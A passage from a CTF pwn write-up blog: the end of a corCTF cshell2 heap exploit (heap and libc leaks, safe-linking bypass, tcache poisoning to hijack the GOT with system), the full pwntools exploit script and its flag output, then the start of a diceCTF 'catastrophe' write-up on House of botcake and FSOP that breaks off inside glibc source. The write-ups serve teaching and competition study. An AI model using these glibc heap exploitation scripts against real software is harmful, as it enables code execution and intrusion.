0x1de15e0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de15f0	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1600	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1610	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1620	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1630	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1640	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1650	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1660	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1670	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1680	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de1690	0x5959595959595959	0x5959595959595959	YYYYYYYYYYYYYYYY
0x1de16a0	0x5959595959595959	0x0a59595959595959	YYYYYYYYYYYYYYY.	 <-- unsortedbin[all][0] [chunk1]
0x1de16b0	0x00007f34f64c3cc0	0x00007f34f64c3cc0	.<L.4....<L.4...
"""

Then let's get a heap leak, we request back from the tcache the 8-th chunk, we free the 9-th chunk that is allocated right after the 8-th to be able to leak its next free pointer same way as for the libc previously. Plus we have to defeat safe-linking. To understand the defeat of safe-linking I advice you to read this. It ends up to the decrypt_pointer function that makes use of known parts of the encrypted fp to decrypt the whole pointer. I didn't code the function by myself, too lazy for that, code comes from the AeroCTF heap-2022 writeup.

def decrypt_pointer(leak: int) -> int:
    parts = []

    parts.append((leak >> 36) << 36)
    parts.append((((leak >> 24) & 0xFFF) ^ (parts[0] >> 36)) << 24)
    parts.append((((leak >> 12) & 0xFFF) ^ ((parts[1] >> 24) & 0xFFF)) << 12)

    return parts[0] | parts[1] | parts[2]

add(11, 1032, b"", b"", b"", 1337, b"")

delete(9)
edit(11, b"", b"", b"", 1337, b"X"*(1032 - 64 + 7))

show(11)
io.recvuntil(b"X"*(1032 - 64 + 7) + b"\n")
heap = decrypt_pointer(pwn.u64(io.recvuntil(b"1 Add\n")[:-6].ljust(8, b"\x00"))) - 0x1000
pwn.log.info(f"heap: {hex(heap)}")

# Heap state

"""
0x13f6310	0x0000000000000000	0x0000000000000411	................ [chunk8]
0x13f6320	0x00000000013f4c0a	0x000000000000000a	.L?.............
0x13f6330	0x000000000000000a	0x0000000000000539	........9.......
0x13f6340	0x0000000000000000	0x0000000000000000	................
0x13f6350	0x0000000000000000	0x0000000000000000	................
0x13f6360	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX [chun8->bio]
0x13f6370	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6380	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6390	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f63a0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f63b0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f63c0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f63d0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f63e0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f63f0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6400	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6410	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6420	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6430	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6440	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6450	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6460	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6470	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6480	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6490	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f64a0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f64b0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f64c0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f64d0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f64e0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f64f0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6500	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6510	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6520	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6530	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6540	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6550	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6560	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6570	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6580	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6590	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f65a0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f65b0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f65c0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f65d0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f65e0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f65f0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6600	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6610	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6620	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6630	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6640	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6650	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6660	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6670	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6680	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6690	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f66a0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f66b0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f66c0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f66d0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f66e0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f66f0	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6700	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6710	0x5858585858585858	0x5858585858585858	XXXXXXXXXXXXXXXX
0x13f6720	0x5858585858585858	0x0a58585858585858	XXXXXXXXXXXXXXX.
0x13f6730	0x00000000013f4ce6	0xdc8340f7dfc0b0e1	.L?..........@..	 <-- tcachebins[0x410][0/7] [chunk9]
"""

Then here we are, we leaked both libc and heap base addresses. We just have to to tcache poisoning on free.

Tcache poisoning + PROFIT

We overflow the 8-th chunk to overwrite the next freepointer of chunk9 that is stored at the HEAD of the 0x410 tcachebin. Then we got an arbitrary write. We craft a nice header to be able to request it back from the tcache, and we encrypt the next with the location of the chunk9 to pass safe-linking checks.

Given we hiijack GOT we initialized properly some pointers around to avoid segfaults. We do not get a write into the GOT entry of free cause it is unaliagned and malloc needs 16 bytes aligned next free pointer.

edit(11, b"", b"", b"", 1337, b"X"*(1032 - 64) + pwn.p64(0x411) + pwn.p64(((heap + 0x2730) >> 12) ^ (exe.got.free - 0x8)))

# dumb
add(12, 1032, b"", b"", b"", 1337, b"")

io.sendlineafter(b"5 re-age user\n", b"1")
io.sendlineafter(b"index: \n", str(13).encode())
io.sendlineafter(b"Enter size (1032 minimum): \n", str(1032).encode())
io.sendafter(b"Input firstname: \n", pwn.p64(libc.address + 0xbbdf80))
io.sendafter(b"Input middlename: \n", pwn.p64(libc.sym.system))
io.sendafter(b"Input lastname: \n", pwn.p64(libc.address + 0x71ab0))
io.sendlineafter(b"Input age: \n", str(0).encode())
io.sendafter(b"Input bio: \n", pwn.p64(libc.address + 0x4cb40))

# Finally

delete(0)
io.sendline(b"cat flag.txt")
pwn.log.info(f"flag: {io.recvline()}")

io.interactive()

Here we are:

nasm@off:~/Documents/pwn/corCTF/cshell2$ python3 exploit.py REMOTE HOST=be.ax PORT=31667
[*] '/home/nasm/Documents/pwn/corCTF/cshell2/cshell2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x3fb000)
    RUNPATH:  b'.'
[*] '/home/nasm/Documents/pwn/corCTF/cshell2/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to be.ax on port 31667: Done
[*] libc: 0x7f1d388db000
[*] heap: 0x665000
[*] flag: b'corctf{m0nk3y1ng_0n_4_d3bugg3r_15_th3_b35T!!!}\n'
[*] Switching to interactive mode
$

Appendices

Final exploit:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# this exploit was generated via
# 1) pwntools
# 2) ctfmate

import os
import time
import pwn


# Set up pwntools for the correct architecture
exe = pwn.context.binary = pwn.ELF('cshell2')
libc = pwn.ELF("./libc.so.6")

pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False
pwn.context.timeout = 2000

host = pwn.args.HOST or '127.0.0.1'
port = int(pwn.args.PORT or 1337)


def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if pwn.args.GDB:
        return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return pwn.process([exe.path] + argv, *a, **kw)


def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = pwn.connect(host, port)
    if pwn.args.GDB:
        pwn.gdb.attach(io, gdbscript=gdbscript)
    return io


def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if pwn.args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)


gdbscript = '''
continue
'''.format(**locals())

io = None


io = start()

def add(idx, size, firstname, midname, lastname, age, bio, l=True):
    io.sendlineafter(b"5 re-age user\n", b"1")
    io.sendlineafter(b"index: \n", str(idx).encode())
    io.sendlineafter(b"Enter size (1032 minimum): \n", str(size).encode())
    if l:
        io.sendlineafter(b"Input firstname: \n", firstname)
        io.sendlineafter(b"Input middlename: \n", midname)
        io.sendlineafter(b"Input lastname: \n", lastname)
        io.sendlineafter(b"Input age: \n", str(age).encode())
        io.sendlineafter(b"Input bio: \n", bio)

    else:
        io.sendafter(b"Input firstname: \n", firstname)
        io.sendafter(b"Input middlename: \n", midname)
        io.sendafter(b"Input lastname: \n", lastname)
        io.sendafter(b"Input age: \n", str(age).encode())
        io.sendafter(b"Input bio: \n", bio)



def show(idx):
    io.sendlineafter(b"5 re-age user\n", b"2")
    io.sendlineafter(b"index: ", str(idx).encode())

def delete(idx):
    io.sendlineafter(b"5 re-age user\n", b"3")
    io.sendlineafter(b"index: ", str(idx).encode())

def edit(idx, firstname, midname, lastname, age, bio):
    io.sendlineafter(b"5 re-age user\n", b"4")
    io.sendlineafter(b"index: ", str(idx).encode())
    
    io.sendlineafter(b"Input firstname: \n", firstname)
    io.sendlineafter(b"Input middlename: \n", midname)
    io.sendlineafter(b"Input lastname: \n", lastname)
    io.sendlineafter(b"Input age: \n", str(age).encode())
    io.sendlineafter(b")\n", bio)

def decrypt_pointer(leak: int) -> int:
    parts = []

    parts.append((leak >> 36) << 36)
    parts.append((((leak >> 24) & 0xFFF) ^ (parts[0] >> 36)) << 24)
    parts.append((((leak >> 12) & 0xFFF) ^ ((parts[1] >> 24) & 0xFFF)) << 12)

    return parts[0] | parts[1] | parts[2]

add(0, 1032, b"//bin/sh\x00", b"", b"", 1337, b"")
add(1, 1032, b"", b"", b"", 1337, b"")

for i in range(2, 7+2 + 2):
    add(i, 1032, b"", b"", b"", 1337, b"")

for i in range(2, 7+2):
    delete(i)

delete(1)
edit(0, b"", b"", b"", 1337, b"Y"*(1032 - 64 + 7))

show(0)
io.recvuntil(b"Y"*(1032 - 64 + 7) + b"\n")
libc.address = pwn.u64(io.recvuntil(b"1 Add\n")[:-6].ljust(8, b"\x00")) - 0x1c7cc0
pwn.log.info(f"libc: {hex(libc.address)}")

add(11, 1032, b"", b"", b"", 1337, b"")

delete(9)

edit(11, b"", b"", b"", 1337, b"X"*(1032 - 64 + 7))

show(11)
io.recvuntil(b"X"*(1032 - 64 + 7) + b"\n")
heap = decrypt_pointer(pwn.u64(io.recvuntil(b"1 Add\n")[:-6].ljust(8, b"\x00"))) - 0x1000
pwn.log.info(f"heap: {hex(heap)}")

environ = libc.address + 0xbe02f0

edit(11, b"", b"", b"", 1337, b"X"*(1032 - 64) + pwn.p64(0x411) + pwn.p64(((heap + 0x2730) >> 12) ^ (0x404010)))

# dumb
add(12, 1032, b"", b"", b"", 1337, b"")

#===

io.sendlineafter(b"5 re-age user\n", b"1")
io.sendlineafter(b"index: \n", str(13).encode())
io.sendlineafter(b"Enter size (1032 minimum): \n", str(1032).encode())
io.sendafter(b"Input firstname: \n", pwn.p64(libc.address + 0xbbdf80))
io.sendafter(b"Input middlename: \n", pwn.p64(libc.sym.system))
io.sendafter(b"Input lastname: \n", pwn.p64(libc.address + 0x71ab0))
io.sendlineafter(b"Input age: \n", str(0).encode())
io.sendafter(b"Input bio: \n", pwn.p64(libc.address + 0x4cb40))

delete(0)
io.sendline(b"cat flag.txt")
pwn.log.info(f"flag: {io.recvline()}")

io.interactive()

[diceCTF 2022 - pwn] catastrophe

Thu, 28 Jul 2022 00:00:00 GMT

Introduction

I just learned how to use malloc and free... am I doing this right?

catastrophe is a heap challenge I did during the diceCTF 2022. I did have a lot of issues with the libc and the dynamic linker, thus I did a first time the challenge with the libc that was in /lib/libc.so.6, then I figured out thanks to my teammate supersnail that I was using the wrong libc. Then I did it again with the right libc but the dynamic linker was (again) wrong and I lost a loot of time on it. So well, the challenge wasn't pretty hard but I took a funny way to solve it because I thought the libc had FULL RELRO while it had only PARTIAL RELRO. Find the exploit and the tasks right here.

TL; DR

Leak heap address + defeating safe linking by printing the first free'd chunk in the tcache.
House of botcake to create overlapping chunks and get arbitrary write
FSOP on stdout to leak environ and then ROP over the stack.

What we have

catastrophe is a classic heap challenge here are the classic informations about it:

$ ./libc.so.6 
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3) stable release version 2.35.
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 11.2.0.
libc ABIs: UNIQUE IFUNC ABSOLUTE
For bug reporting instructions, please see:
<https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>.
$ checksec --file libc.so.6 
[*] '/home/nasm/Documents/ctf/2022/diceCTF/pwn/catastrophe/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
$ checksec --file catastrophe 
[*] '/home/nasm/Documents/ctf/2022/diceCTF/pwn/catastrophe/catastrophe'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

2.35 libc, which means there is no more classic hooks like __malloc_hook or __free_hook. The binary allows to:

malloc up to 0x200 bytes and read data in it with the use of fgets
Allocate from the index 0 to 9
free anything given the index is between 0 and 9

Thus we can easily do a House of botcake but first of all we have to defeat the safe linking to properly getting an arbitrary write.

Defeat safe-linking

Since 2.32 is introduced in the libc the safe-linking mechanism that does some xor encyptions on tcache, fastbin next fp to prevent pointer hiijacking. Here is the core of the mechanism:

// https://elixir.bootlin.com/glibc/latest/source/malloc/malloc.c#L340
/* Safe-Linking:
   Use randomness from ASLR (mmap_base) to protect single-linked lists
   of Fast-Bins and TCache.  That is, mask the "next" pointers of the
   lists' chunks, and also perform allocation alignment checks on them.
   This mechanism reduces the risk of pointer hijacking, as was done with
   Safe-Unlinking in the double-linked lists of Small-Bins.
   It assumes a minimum page size of 4096 bytes (12 bits).  Systems with
   larger pages provide less entropy, although the pointer mangling
   still works.  */
#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)

Since for this challenge we're focused on tcache, here is how a chunk is free'd using safe-linking:

// https://elixir.bootlin.com/glibc/latest/source/malloc/malloc.c#L3175
/* Caller must ensure that we know tc_idx is valid and there's room
   for more chunks.  */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache_key;

  e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

Thus, the first time a chunk is inserted into a tcache list, e->next is initialized to &e->next >> 12 (heap base address) xor tcache->entries[tc_idx] which is equal to zero when the list for a given size is empty.

Which means to leak the heap address we simply have to print a free'd chunk once it has been inserted in the tcache.

House of botcake

The House of botcake gives a write what where primitive by poisoning the tcache. The algorithm is:

Allocate 7 0x100 sized chunks to then fill the tcache (7 entries).
Allocate two more 0x100 sized chunks (prev and a in the example).
Allocate a small "barrier" 0x10 sized chunk.
Fill the tcache by freeing the first 7 chunks.
free(a), thus a falls into the unsortedbin.
free(prev), thus prev is consolidated with a to create a large 0x221 sized chunk that is yet in the unsortedbin.
Request one more 0x100 sized chunk to let a single entry left in the tcache.
free(a) again, given a is part of the large 0x221 sized chunk it leads to an UAF. Thus a falls into the tcache.
That's finished, to get a write what where we just need to request a 0x130 sized chunk. Thus we can hiijack the next fp of a that is currently referenced by the tcache by the location we wanna write to. And next time two 0x100 sized chunks are requested, the second one will be the target location.

Getting arbitrary write

To make use of the write what were we got thanks to the House of botcake, we need to get both heap and libc leak. To leak libc that's pretty easily we just need to print out a free'd chunk stored into the unsortedbin, it's forward pointer is not encrypted with safe-linking.

As seen previously, to bypass safe-linking we have to print a free'd chunk once it has been inserted in the tcache. It would give us the base address of the heap. When we got it, we just have to initialize the location we wanna write to location ^ ((heap_base + chunk_offset) >> 12) to encrypt properly the pointer, this way the primitive is efficient.

Implmentation of the House of botcake + safe-linking bypass, heap and libc leak:


io = start()

def alloc(idx, data, size):
   io.sendlineafter("-\n> ", b"1") 
   io.sendlineafter("Index?\n> ", str(idx).encode()) 
   io.sendlineafter("> ", str(size).encode()) 
   io.sendlineafter(": ", data) 

def free(idx):
   io.sendlineafter("> ", b"2") 
   io.sendlineafter("> ", str(idx).encode())

def view(idx):
   io.sendlineafter("> ", b"3") 
   io.sendlineafter("> ", str(idx).encode())

for i in range(7):
    alloc(i, b"", 0x100)

free(0)

view(0)

heap = ((pwn.u64(io.recvline()[:-1].ljust(8, b"\x00")) << 12))
pwn.log.info(f"heap @ {hex(heap)}")
# then we defeated safe linking lol

alloc(0, b"YY", 0x100)
# request back the chunk we used to leak the heap

alloc(7, b"YY", 0x100) # prev
alloc(8, b"YY", 0x100) # a

alloc(9, b"/bin/sh\0", 0x10) # barrier

# fill tcache
for i in range(7):
    free(i)

free(8) # free(a) => unsortedbin
free(7) # free(prev) => merged with a

# leak libc
view(8)

libc = pwn.u64(io.recvline()[:-1].ljust(8, b"\x00")) - 0x219ce0 # - 0x1bebe0 # offset of the unsorted bin

rop = pwn.ROP(libc)
binsh = next(libc.search(b"/bin/sh\x00"))
rop.execve(binsh, 0, 0)

environ = libc.address + 0x221200
stdout = libc.address + 0x21a780

pwn.log.info(f"libc: {hex(libc)}")
pwn.log.info(f"environ: {hex(environ)}")
pwn.log.info(f"stdout: {hex(stdout)}")

alloc(0, b"YY", 0x100) # pop a chunk from the tcache to let an entry left to a 
free(8) # free(a) => tcache

alloc(1, b"T"*0x108 + pwn.p64(0x111) + pwn.p64((stdout ^ ((heap + 0xb20) >> 12))), 0x130) 
# 0x130, too big for tcache => unsortedbin UAF on a to replace a->next with the address of the target location (stdout) 
alloc(2, b"TT", 0x100)
# pop a from tcache

# next 0x100 request will return the target location (stdout)

"""
0x55c4fbcd7a00:	0x0000000000000000	0x0000000000000141 [prev]
0x55c4fbcd7a10:	0x5454545454545454	0x5454545454545454
0x55c4fbcd7a20:	0x5454545454545454	0x5454545454545454
0x55c4fbcd7a30:	0x5454545454545454	0x5454545454545454
0x55c4fbcd7a40:	0x5454545454545454	0x5454545454545454
0x55c4fbcd7a50:	0x5454545454545454	0x5454545454545454
0x55c4fbcd7a60:	0x5454545454545454	0x5454545454545454
0x55c4fbcd7a70:	0x5454545454545454	0x5454545454545454
0x55c4fbcd7a80:	0x5454545454545454	0x5454545454545454
0x55c4fbcd7a90:	0x5454545454545454	0x5454545454545454
0x55c4fbcd7aa0:	0x5454545454545454	0x5454545454545454
0x55c4fbcd7ab0:	0x5454545454545454	0x5454545454545454
0x55c4fbcd7ac0:	0x5454545454545454	0x5454545454545454
0x55c4fbcd7ad0:	0x5454545454545454	0x5454545454545454
0x55c4fbcd7ae0:	0x5454545454545454	0x5454545454545454
0x55c4fbcd7af0:	0x5454545454545454	0x5454545454545454
0x55c4fbcd7b00:	0x5454545454545454	0x5454545454545454
0x55c4fbcd7b10:	0x5454545454545454	0x0000000000000111 [a]
0x55c4fbcd7b20:	0x00007f5d45ff5b57	0x4f60331b73b9000a
0x55c4fbcd7b30:	0x0000000000000000	0x0000000000000000
0x55c4fbcd7b40:	0x0000000000000000	0x00000000000000e1 [unsortedbin]
0x55c4fbcd7b50:	0x00007f5819b0dce0	0x00007f5819b0dce0
0x55c4fbcd7b60:	0x0000000000000000	0x0000000000000000
0x55c4fbcd7b70:	0x0000000000000000	0x0000000000000000
0x55c4fbcd7b80:	0x0000000000000000	0x0000000000000000
0x55c4fbcd7b90:	0x0000000000000000	0x0000000000000000
0x55c4fbcd7ba0:	0x0000000000000000	0x0000000000000000
0x55c4fbcd7bb0:	0x0000000000000000	0x0000000000000000
0x55c4fbcd7bc0:	0x0000000000000000	0x0000000000000000
0x55c4fbcd7bd0:	0x0000000000000000	0x0000000000000000
0x55c4fbcd7be0:	0x0000000000000000	0x0000000000000000
0x55c4fbcd7bf0:	0x0000000000000000	0x0000000000000000
0x55c4fbcd7c00:	0x0000000000000000	0x0000000000000000
0x55c4fbcd7c10:	0x0000000000000000	0x0000000000000000
0x55c4fbcd7c20:	0x00000000000000e0	0x0000000000000020
0x55c4fbcd7c30:	0x0068732f6e69622f	0x000000000000000a
0x55c4fbcd7c40:	0x0000000000000000	0x00000000000203c1 [top chunk]
"""

FSOP on stdout to leak environ

I didn't see first that only PARTIAL RELRO was enabled on the libc, so the technique I show you here was thought to face a 2.35 libc with FULL RELRO enabled that the reason why I didn't just hiijack some GOT pointers within the libc.

A pretty convenient way to gain code execution when the hooks (__malloc_hook, __free_hook) are not present (since 2.32 cf this for 2.34) is to leak the address of the stack to then write a ROPchain on it. To leak a stack address we can make use of the environ symbol stored in the dynamic linker, it contains a pointer toward **envp.

To read this pointer we need a read what where primitive! Which can be achieved through a file stream oriented programming (FSOP) attack on stdout for example. To dig more FSOP I advise you to read this write-up as well as this one.

To understand the whole process I'll try to introduce you to FSOP. First of all the target structure is stdout, we wanna corrupt stdout because it's used ritght after the fgets that reads the input from the user by the putchar function. Basically on linux "everything is a file" from the character device the any stream (error, input, output, opened file) we can interact with a resource just by opening it and by getting a file descriptor on it, right ? This way each file descripor has an associated structure called FILE you may have used if you have already done some stuff with files on linux. Here is its definition:

// https://elixir.bootlin.com/glibc/latest/source/libio/bits/types/struct_FILE.h#L49
/* The tag name of this struct is _IO_FILE to preserve historic
   C++ mangled names for functions taking FILE* arguments.
   That name should not be used in new code.  */
struct _IO_FILE
{
  int _flags;		/* High-order word is _IO_MAGIC; rest is flags. */

  /* The following pointers correspond to the C++ streambuf protocol. */
  char *_IO_read_ptr;	/* Current read pointer */
  char *_IO_read_end;	/* End of get area. */
  char *_IO_read_base;	/* Start of putback+get area. */
  char *_IO_write_base;	/* Start of put area. */
  char *_IO_write_ptr;	/* Current put pointer. */
  char *_IO_write_end;	/* End of put area. */
  char *_IO_buf_base;	/* Start of reserve area. */
  char *_IO_buf_end;	/* End of reserve area. */

  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  char *_IO_save_end; /* Pointer to end of non-current get area. */

  struct _IO_marker *_markers;

  struct _IO_FILE *_chain;

  int _fileno;
  int _flags2;
  __off_t _old_offset; /* This used to be _offset but it's too small.  */

  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

struct _IO_FILE_complete
{
  struct _IO_FILE _file;
#endif
  __off64_t _offset;
  /* Wide character stream stuff.  */
  struct _IO_codecvt *_codecvt;
  struct _IO_wide_data *_wide_data;
  struct _IO_FILE *_freeres_list;
  void *_freeres_buf;
  size_t __pad5;
  int _mode;
  /* Make sure we don't get into trouble again.  */
  char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)];
};

Here are brievly role of each fields:

_flags stands for the behaviour of the stream when a file operation occurs.
_IO_read_ptr address of input within the input buffer that has been already used.
_IO_read_end end address of the input buffer.
_IO_read_base base address of the input buffer.
_IO_write_base base address of the ouput buffer.
_IO_write_ptr points to the character that hasn't been printed yet.
_IO_write_end end address of the output buffer.
_IO_buf_base base address for both input and output buffer.
_IO_buf_end end address for both input and output buffer.
_chain stands for the single linked list that links of all file streams.
_fileno stands for the file descriptor associated to the file.
_vtable_offset stands for the offset of the vtable we have to use.
_offset stands for the current offset within the file.

Relatable flags:

_IO_USER_BUF During line buffered output, _IO_write_base==base() && epptr()==base(). However, ptr() may be anywhere between base() and ebuf(). This forces a call to filebuf::overflow(int C) on every put. If there is more space in the buffer, and C is not a '\n', then C is inserted, and pptr() incremented.
_IO_MAGIC Magic number of fp->_flags.
_IO_UNBUFFERED If a filebuf is unbuffered(), the _shortbuf[1] is used as the buffer.
_IO_LINKED In the list of all open files.

To understand I advise you to read this great article about FILE structures. What we gonna do right now is trying to understand the use of stdout during within the putchar function. And we will try to find a code path that will not write the provided argument (in this case the \n taken by putchar) into the output buffer we control but rather flush the file stream to directly print its content and then print the provided argument. This way we could get an arbitrary read by controlling the output buffer. Let's take a closer look at the __putc_unlocked_body macro:


// https://elixir.bootlin.com/glibc/latest/source/libio/bits/types/struct_FILE.h#L106
#define __putc_unlocked_body(_ch, _fp)					\
  (__glibc_unlikely ((_fp)->_IO_write_ptr >= (_fp)->_IO_write_end)	\
   ? __overflow (_fp, (unsigned char) (_ch))				\
   : (unsigned char) (*(_fp)->_IO_write_ptr++ = (_ch)))

It ends up calling __overflow if there is no more space in the output buffer ((_fp)->_IO_write_ptr >= (_fp)->_IO_write_end)). That's basically the code path we need to trigger to call __overflow instead of just write the provided char into the output buffer. So first condition:

(_fp)->_IO_write_ptr >= (_fp)->_IO_write_end

// https://elixir.bootlin.com/glibc/latest/source/libio/genops.c#L198
int
__overflow (FILE *f, int ch)
{
  /* This is a single-byte stream.  */
  if (f->_mode == 0)
    _IO_fwide (f, -1);
  return _IO_OVERFLOW (f, ch);
}

Given the file stream isn't oriented (byte granularity) we directly reach the _IO_OVERFLOW call, now the final goal to get a leak is to reach the _IO_do_write call:

// https://elixir.bootlin.com/glibc/latest/source/libio/fileops.c#L730

int
_IO_new_file_overflow (FILE *f, int ch)
{
  if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
    {
      f->_flags |= _IO_ERR_SEEN;
      __set_errno (EBADF);
      return EOF;
    }
  /* If currently reading or no buffer allocated. */
  if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL)
    {
      /* Allocate a buffer if needed. */
      if (f->_IO_write_base == NULL)
	{
	  _IO_doallocbuf (f);
	  _IO_setg (f, f->_IO_buf_base, f->_IO_buf_base, f->_IO_buf_base);
	}
      /* Otherwise must be currently reading.
	 If _IO_read_ptr (and hence also _IO_read_end) is at the buffer end,
	 logically slide the buffer forwards one block (by setting the
	 read pointers to all point at the beginning of the block).  This
	 makes room for subsequent output.
	 Otherwise, set the read pointers to _IO_read_end (leaving that
	 alone, so it can continue to correspond to the external position). */
      if (__glibc_unlikely (_IO_in_backup (f)))
	{
	  size_t nbackup = f->_IO_read_end - f->_IO_read_ptr;
